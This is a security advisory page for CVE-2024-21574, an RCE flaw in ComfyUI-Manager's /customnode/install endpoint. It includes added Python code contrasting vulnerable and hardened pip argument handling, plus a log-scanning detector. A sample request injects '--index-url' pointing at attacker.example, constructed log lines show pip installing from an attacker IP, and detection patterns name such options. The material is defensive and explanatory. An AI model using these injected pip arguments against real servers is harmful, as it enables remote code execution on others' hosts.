Platform
python
Component
comfyui-manager
Fixed in
2.51.1
CVE-2024-21574 is a remote code execution (RCE) vulnerability in ComfyUI-Manager, the Python extension that installs and manages custom nodes for ComfyUI. The POST /customnode/install endpoint, used to install a custom node, accepts a 'pip' field whose entries are handed to pip install without sufficient validation. An attacker who can reach the endpoint can therefore make the server pip-install a package name, URL or VCS reference of their choosing; pip then runs the build hooks of that distribution and installs whatever it contains, which gives arbitrary code execution with the privileges of the ComfyUI process. Versions before 2.51.1 are affected; version 2.51.1 fixes the issue.
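The following is an added illustration, not ComfyUI-Manager's own code and not the project's fix: a hypothetical `vulnerable_pip_args` shows how an unvalidated 'pip' list flows straight into a pip argv (so an option such as --index-url or a URL reaches pip untouched), and `hardened_pip_args` shows the strict requirement-syntax check plus optional allowlist a fixed handler would apply. The request shape, the function names, the 200-character limit and the allowlist are assumptions.

```python
import re
import sys

# Strict subset of PEP 508: distribution name, optional extras, optional
# comma-separated version specifiers. Deliberately excludes URLs, "name @ url"
# direct references, VCS prefixes (git+https://...), local paths, environment
# markers and anything starting with "-" (pip options such as --index-url).
_NAME = r"[A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?"
_EXTRAS = r"(?:\[[A-Za-z0-9._-]+(?:\s*,\s*[A-Za-z0-9._-]+)*\])?"
_SPEC = r"(?:===|==|!=|<=|>=|~=|<|>)\s*[A-Za-z0-9.*+!-]+"
_REQ_RE = re.compile(rf"^({_NAME}){_EXTRAS}(?:\s*{_SPEC}(?:\s*,\s*{_SPEC})*)?$")


def vulnerable_pip_args(payload):
    """What an unvalidated handler ends up running: every string in the
    request's 'pip' field is appended to the pip command line as-is, so a
    URL, a VCS reference or an option like --index-url reaches pip untouched.
    (Hypothetical handler, constructed for this example.)"""
    return [sys.executable, "-m", "pip", "install", *payload.get("pip", [])]


def normalize_name(name):
    """PEP 503 normalisation so an allowlist cannot be bypassed through
    case or -/_/. variations (Numpy, num_py and num.py all become num-py)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def validate_requirement(entry, allowlist=None):
    """Return the stripped entry if it is a plain name[extras][specifiers]
    requirement (and, when an allowlist is given, a permitted distribution).
    Raise ValueError otherwise."""
    if not isinstance(entry, str) or len(entry) > 200:
        raise ValueError("pip entry must be a short string")
    candidate = entry.strip()
    m = _REQ_RE.match(candidate)
    if m is None:
        raise ValueError(f"rejected pip entry: {entry!r}")
    if allowlist is not None and normalize_name(m.group(1)) not in allowlist:
        raise ValueError(f"distribution not in allowlist: {entry!r}")
    return candidate


def is_valid_requirement(entry, allowlist=None):
    """Boolean wrapper around validate_requirement for quick checks."""
    try:
        validate_requirement(entry, allowlist)
        return True
    except ValueError:
        return False


def hardened_pip_args(payload, allowlist=None):
    """Hardened counterpart: every entry must pass validate_requirement and
    no option is ever taken from the request, so the index pip consults is
    whatever the server configured. Raises on the first bad entry, so
    nothing at all is installed from a partially malicious request."""
    entries = payload.get("pip", [])
    if not isinstance(entries, list):
        raise ValueError("'pip' must be a list of requirement strings")
    cleaned = [validate_requirement(e, allowlist) for e in entries]
    return [sys.executable, "-m", "pip", "install", "--no-input", *cleaned]


if __name__ == "__main__":
    # Constructed request body in the shape the advisory describes (a JSON
    # object with a 'pip' list); it is not a captured exploit payload.
    evil = {"pip": ["--index-url=https://attacker.example/simple", "numpy"]}
    print("unvalidated argv:", vulnerable_pip_args(evil))
    try:
        hardened_pip_args(evil)
    except ValueError as exc:
        print("hardened handler:", exc)
    print(hardened_pip_args({"pip": ["numpy>=1.26,<2", "requests[socks]==2.32.3"]}))
```

The two functions are only built to show the argv pip would receive; neither one executes pip. Rejecting the whole request on the first bad entry, rather than filtering entries, matters: a filtered list still installs the benign-looking packages alongside which the malicious one was smuggled.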
The impact of CVE-2024-21574 is severe. A successful exploit gives the attacker code execution with the privileges of the ComfyUI process on the host: they can run arbitrary commands, install persistent malware, read models, workflows and any credentials the process can reach, and use the host as a foothold to pivot further into the network. Because the primitive is a pip install, the attacker does not even need a memory-corruption chain; pointing pip at a malicious package, index or URL is enough, and pip will happily execute the package's build code. In AI workflows this also means the attacker can tamper with models and pipeline outputs on that host. The missing input validation is the direct cause of the RCE, which makes this a high-priority fix.
CVE-2024-21574 was publicly disclosed on December 12, 2024. The exploit is simple to build: a single POST request whose 'pip' field names the attacker's package, URL or index. No public proof-of-concept has been widely reported, but given how little is needed one could appear at any time. The EPSS score shown on this page is 7.10% (91st percentile), i.e. a higher estimated probability of exploitation in the next 30 days than roughly nine out of ten published CVEs. It is not currently listed in the CISA KEV catalog.
Organizations and individuals running ComfyUI-Manager for AI workflows are at risk, above all those whose instance is reachable from untrusted networks or who allow custom node installation from untrusted sources. Shared hosting environments in which several users share one ComfyUI-Manager instance are especially exposed: a single user's custom node installation runs with the privileges of the shared process, so one compromised account or request can compromise the whole environment.
• linux / server:
# assumes ComfyUI runs as a systemd unit named comfyui-manager; adjust the unit name to your deployment
journalctl -u comfyui-manager -g 'pip install'
• python / supply-chain:
import importlib.metadata, subprocess, sys

print(subprocess.run([sys.executable, '-m', 'pip', '--version'], capture_output=True, text=True, check=True).stdout)
# only meaningful when ComfyUI-Manager was installed as the pip distribution "comfyui-manager"; raises PackageNotFoundError otherwise
print('comfyui-manager', importlib.metadata.version('comfyui-manager'))
• generic web:
# exposure check only, not a vulnerability test: any HTTP status (even 405) means the endpoint is reachable from where you run this
curl -s -o /dev/null -w '%{http_code}\n' http://<comfyui_manager_ip>/customnode/install
Disclosure
Exploit status
EPSS
7.10% (percentile 91%)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2024-21574 is to upgrade ComfyUI-Manager to version 2.51.1 or later immediately. If upgrading is not feasible right away because of compatibility concerns or breaking changes, apply temporary workarounds: restrict network access to the ComfyUI instance, and to the /customnode/install endpoint in particular, to trusted sources only, for example behind a reverse proxy or VPN; where a Web Application Firewall (WAF) sits in front of the instance, add rules that block POST bodies whose 'pip' entries contain URLs, VCS references or pip options such as --index-url; review every custom node before installing it. On the detection side, monitor for pip install processes spawned by the ComfyUI process, especially ones whose arguments contain URLs, VCS references or index options, for POST requests to /customnode/install from unexpected clients, and for unexpected packages appearing in the ComfyUI virtual environment. There is no single signature for a malicious request, since a legitimate install and a malicious one look alike until the pip arguments are inspected.
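As an added example (not taken from the page or from the ComfyUI-Manager project) of the monitoring the paragraph recommends, the script below scans constructed log lines from two sources: a reverse-proxy access log, flagging POST /customnode/install requests from outside a trusted address range, and journald-style process lines, flagging pip install invocations whose arguments carry options, URLs, VCS references, direct references or local paths. The log line formats (including the "exec:" field), the host name, the trusted networks and the sample addresses are all assumptions constructed for this example.

```python
import ipaddress
import re
import shlex

# Constructed sample lines, not captured from a real system. Lines 1-3 mimic a
# reverse-proxy access log; lines 4-6 mimic journald lines in which the ComfyUI
# service logs the command line of every subprocess it spawns (the "exec:" field
# is an assumed log format, not something ComfyUI emits by default).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2024:10:01:02 +0000] "POST /customnode/install HTTP/1.1" 200 17
203.0.113.7 - - [12/Dec/2024:10:02:15 +0000] "POST /customnode/install HTTP/1.1" 200 17
10.0.0.5 - - [12/Dec/2024:10:03:00 +0000] "GET / HTTP/1.1" 200 9120
Dec 12 10:01:03 host comfyui[4242]: exec: /opt/venv/bin/python -m pip install numpy>=1.26
Dec 12 10:02:16 host comfyui[4242]: exec: /opt/venv/bin/python -m pip install --index-url https://203.0.113.7/simple totally-legit-nodes
Dec 12 10:02:40 host comfyui[4242]: exec: /opt/venv/bin/python -m pip install git+https://203.0.113.7/x.git
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
PIP_RE = re.compile(r"\bpip3? install\b(.*)$")

# Assumed trusted client ranges: the internal network and localhost.
TRUSTED = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("127.0.0.0/8")]


def is_trusted(ip, trusted=TRUSTED):
    """True if the client address lies in one of the trusted networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in trusted)


def suspicious_pip_tokens(argv):
    """Arguments that should never appear when the installer is only meant to
    install named packages from the configured index: pip options, URLs, VCS
    references, "name @ url" direct references, local paths and archive files."""
    flagged = []
    for tok in argv:
        if (tok.startswith("-") or "://" in tok or tok == "@"
                or tok.startswith(("git+", "hg+", "svn+", "bzr+", ".", "/"))
                or tok.endswith((".whl", ".tar.gz", ".zip"))):
            flagged.append(tok)
    return flagged


def scan(log_text, trusted=TRUSTED):
    """Return a list of alerts, in log order, for the two conditions above."""
    alerts = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            ip, method, path, _status = m.groups()
            if (method == "POST" and path.split("?")[0] == "/customnode/install"
                    and not is_trusted(ip, trusted)):
                alerts.append(("untrusted-install-request", ip, path))
            continue
        m = PIP_RE.search(line)
        if m:
            try:
                argv = shlex.split(m.group(1))
            except ValueError:  # unbalanced quotes in the logged command line
                argv = m.group(1).split()
            bad = suspicious_pip_tokens(argv)
            if bad:
                alerts.append(("suspicious-pip-install", bad))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The process-line check is the more reliable of the two, because it sees what pip was actually asked to do regardless of how the request arrived; the access-log check only establishes who talked to the endpoint, which is still useful for scoping an incident once an unexpected pip install has been found.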
Update ComfyUI-Manager to version 2.51.1 or later. This version fixes the remote code execution vulnerability by properly validating the 'pip' field in the POST request to the /customnode/install endpoint. To update, use the Python package manager (pip) or follow the instructions provided by the plugin developer.
CVE-2024-21574 is a critical remote code execution vulnerability in ComfyUI-Manager versions before 2.51.1. It lets an attacker execute arbitrary code on the host because the /customnode/install endpoint passes the 'pip' field of the request to pip install without sufficient validation.
You are affected if you are running any ComfyUI-Manager version before 2.51.1. Upgrade to version 2.51.1 or later immediately to remove the risk.
The recommended fix is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately possible, restrict access to the /customnode/install endpoint and implement WAF rules.
While no widespread exploitation has been confirmed, the vulnerability takes a single crafted request to exploit, which makes it a likely target. Monitor your systems closely for unexpected pip install activity and for requests to /customnode/install from unknown clients.
Refer to the ComfyUI-Manager project's official repository and release notes for the latest information and security advisories.